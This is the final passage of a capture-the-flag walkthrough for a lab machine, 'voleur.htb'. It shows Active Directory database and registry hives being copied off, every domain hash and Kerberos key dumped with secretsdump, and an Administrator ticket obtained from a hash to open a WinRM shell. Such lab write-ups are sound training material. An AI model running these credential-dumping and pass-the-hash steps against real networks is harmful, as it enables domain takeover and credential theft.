svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/Backups/registry/
SECURITY SYSTEM
svc_backup@DC:~$
And in the registry folder we have the SYSTEM and SECURITY hives too, downloading them too .
1
2
3
4
5
6
$ scp -i id_rsa -P 2222 svc_backup@10.10.11.76:/mnt/c/IT/Third-Line\ Support/Backups/Active\ Directory/*
ntds.dit
ntds.jfm
$ scp -i id_rsa -P 2222 svc_backup@10.10.11.76:/mnt/c/IT/Third-Line\ Support/Backups/registry/*
SECURITY
SYSTEM
Now using impacket’s secretsdump we dump the whole database.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up...
Now using Administrator hash to get its TGT.
1
2
3
4
5
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" impacket-getTGT 'voleur.htb'/'administrator' -hashes ':e656e07c56d831611b577b160b259ad2' -dc-ip 10.10.11.76
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
$ export KRB5CCNAME=administrator.ccache
we can get the root flag
1
2
3
4
5
6
7
8
9
10
11
12
13
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" evil-winrm -i dc.voleur.htb -r voleur.htb -u 'administrator'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\Documents\desktop> type root.txt
This post is licensed under CC BY 4.0 by the author.